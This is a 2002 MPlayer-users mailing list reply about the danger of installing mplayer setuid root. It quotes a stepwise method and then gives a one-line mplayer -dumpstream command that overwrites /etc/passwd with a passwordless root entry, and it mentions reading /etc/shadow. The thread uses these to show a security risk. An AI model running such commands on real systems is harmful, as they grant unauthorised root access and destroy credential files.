[MPlayer-users] Setuid root mplayer
Arpi
arpi at thot.banki.hu
Wed Aug 28 16:03:02 CEST 2002
Hi,
> 1) Make an mp3 file containing the string (\n = newline):
>
> \nroot::0:0::/root:/bin/sh\n
>
> 2) Mux it into an avi with mencoder.
>
> 3) ln -s /etc/passwd stream.dump
>
> 4) mplayer -dumpstream your.avi
echo "root::0:0::/root:/bin/sh" | mplayer -dumpstream -dumpfile /etc/passwd -
is enough...
(mplayer -dumpstream can be use to copy/cat files :))
> 5) Login as root with no password.
:)
> Sound good? That's just a dumb simple approach that assumes blank
> passwords are allowed on the system and the passwords are stored in
> /etc/passwd. Of course there are much better ways too.
LGB wrote a subtitle demuxer to support /etc/shadow as subtitle :)
it displayed each line for a few seconds for any file :)
A'rpi / Astral & ESP-team
--
Developer of MPlayer, the Movie Player for Linux - http://www.MPlayerHQ.hu
More information about the MPlayer-users
mailing list